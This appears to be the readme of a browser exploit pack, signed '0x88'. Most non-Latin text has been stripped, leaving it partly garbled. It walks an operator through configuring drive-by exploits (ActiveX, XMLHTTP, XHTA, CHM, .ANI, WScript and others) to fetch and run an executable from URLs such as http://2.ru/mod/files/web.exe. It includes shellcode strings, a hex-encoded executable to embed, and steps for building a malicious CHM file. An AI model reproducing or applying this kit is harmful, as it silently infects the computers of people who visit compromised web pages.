   :
~ jpg+chm Exploit
~ JRL Exploit
~ ActivX Exploit
~ ActivX2 Exploit
~ XMLHTTP Exploit
~ XHTA Exploit
~ BIN-HEX Exploit
~ XML Exploit
~ PPP 4 Exploit
~ WScript Exploit
~ .ANI Exploit
~ IFRAME Tag Overflow Exploit
~ blnmgr.dll COM Object Remote Exploit
~ Msdds.dll Remote Code Execution Exploit
~ DHTML Object Memory Corruption Exploit
~ javaprxy.dll Object Remote Exploit
+  ,     (LZ SP2  Cmd)
+     explorer.exe   1.8 Kb
                   
&&&&&&&&&&&&&&&&&     &&&&&&&&&&&&&&&&&&&&&&&&&&
 progs/DownLod3r
 explorer.asm,   url: crypt <http://1.ru/mod/files/web.exe>   ,   <>   .  make.bat   =)).

&&&&&&&&&&&&&&&&&   "Shell"   &&&&&&&&&&&&&&&&&&&
 progs/SHELLCODE_GEN
 payload.bat    http://xxx/load.exe    , , ,   beta.bat.     2K-EN-0x77E70000, 95-EN-0xBFF70000, 98-EN-0xBFF70000.....   ,     :
"%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9...........................".  
       ,    
"%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9..........................."
 ,        ,      mod/shell/shellcodes/. 

&&&&&&&&&&&&&&&&&   jpg+chm  &&&&&&&&&&&&&&&&&&&
&&&&& jpg+chm.php &&&&&&  mod/ok/jpg+chm
-       IE 5.0 - 6.0 SP1
-  SP1    
-     chm (       )    jpeg (   2004  ).       .

     :
 -    :
        - ch.chm       |-  ,     html    
        - counter.gif  |- html  -  ch.chm
        -  ch     |-  x,    chm 
        - x.htm        |-  chm 
        - open.exe     |-      

   CHM :
    -    htm2chm (    progs)
    -   - mod/ok/jpg+chm/help  4  (1.gif,2.gif,3.gif,4.gif)     :
    1.      "../ch/"   "open.exe" (  -  "")
    2.   "htm2chm"   "Compiler" (.1) 
    3.      "chm"  (.2)
    4.  "Add" -    "none" (.3)
    5.   ,     (.4)
    6.     "../ch/",   2  -   ,  "Start" (.5),    ,  Yes 
    7.  ,      .   2 : "counter.gif"  "ch.chm"

&&&&&&&&&&&&&&&&&&&&&& Java Exploit &&&&&&&&&&&&&&&&&&
&&&&& jrl.php &&&&&&
      mod/ok/java   java.jar
<param name="ModulePath" value="http://2.ru/mod/files/web.exe">         exe ,       mod/files/.

&&&&&&&&&&&&&&&&&&&&&& ActivX Exploit &&&&&&&&&&&&&&&&
&&&&& ax.php &&&&&&
  ,      mod/files/web.exe (var exepath='mod/files/web.exe';).

&&&&&&&&&&&&&&&&&&&&&& ActivX2 Exploit &&&&&&&&&&&&&&&&
&&&&& ax2.php &&&&&&
  ax2.php  codebase="http://2.ru/mod/files/web.exe",    .


&&&&&&&&&&&&&&&&&&&&&& XMLHTTP Exploit &&&&&&&&&&&&&&&&&
&&&&& xmlhttp.php &&&&&&
   http://wmzarabotok.info/dos/test.exe     URL

&&&&&&&&&&&&&&&&&&&&&& XHTA Exploit  PPP4 &&&&&&&&&&&&&
&&&&& xhta.php  ppp3.php &&&&&&
1) XHTA

  3 :
 - xhta.php
 - enter.php (    )
 - xhta.hta (     (  java encoderom)

 xhta.hta    

Ve3g0x88="!!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!"

      .     WINHEX. 
 WinHex.exe. File >> Open -   .  Cntrl+A -  .
      Offset >> Edit >> Copy Block >> Hex Values. 
   :

4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000023B94CC067D8229367D8229367D82293E4C42C9366D822938FC7269365D8229338FA299363D8229305C7319360D8229367D823935CD822938FC7299364D82293DFDE249366D822935269636867D8229300000000000000000000000000000000000000000000...........
  ( !!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!).

2) PPP3 
C ppp     ,   XHTA.    ppp3.hta V=V+(D("!!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!")).       !!!!!!!!!!!!!!!!!!HEX!!!!!!!!!!!!!!!!!!


&&&&&&&&&&&&&&&&&  BIN-HEX Exploit &&&&&&&&&&&&&&&&&&&
&&&&& bh.php &&&&&&
  bh.php    index.php   <? include("bh.php");?>  <BODY>  ,     mod/popup/bh/   bh.html,          bin2hex (progs/bin2hex.exe). 
    mod/bh/bh.html,   (This file must be converted with BinHex 4.0),       
:&&4&8e3Z49K&!%P&66p*3Ndr!*!%$J&3"8P569U!!!%!N!-%!"!!rrm!!%!"!*!
'3!&3)i!!N!-1(lS1!,3*c5'i!8c0)A4SDA-JF(*[Ch*KE5"MB@jZEh3JBQ8JFR9......
-      .     (  web.exe)   progs,  bin2hex.exe,  F2,  web.exe,  Open   .    web.HQX,   ,         ,    mod/popup/bh/bh.html.

&&&&&&&&&&&&&&&&&  XML Exploit &&&&&&&&&&&&&&&&&&&&&&&
&&&&& xml.php &&&&&&
  site="http://2.ru/mod/files/web.exe";     .

&&&&&&&&&&&&&&&&&  WScript Exploit &&&&&&&&&&&&&&&&&&&
&&&& sh.js &&&&&&  mod/popup/wscript
  var szURL = "http://2.ru/mod/files/web.exe";  .

&&&&&&&&&&&&&&&&&  .ANI Exploit &&&&&&&&&&&&&&&&&&&&&&
&&&& ani.asm &&&&&&  progs/ANISPL
 ani.asm ,   db "http://site.ru/mod/web.exe",0      , .  make.bat,  ani.exe,  ,  ani.anr  ani.php,      mod/ok/ani/.

&&&&&&&&&&&&&&&&&&&&&& !!!!!! &&&&&&&&&&&&&&&&&&&&&&&&
&&&&&   &&&&&&

  progs      SearchandReplace5.1.exe.   ,          
  .   ! ,  , .   Path  mod,  File Mask *.php, Search for    (    http://2.ru/mod/files/web.exe)   Replace with   .      ,   .          .


&&&&&&&&&&&&&&&&&&&&&&&&&
&  0x88            &
& ICQ: 92777755         &
&&&&&&&&&&&&&&&&&&&&&&&&&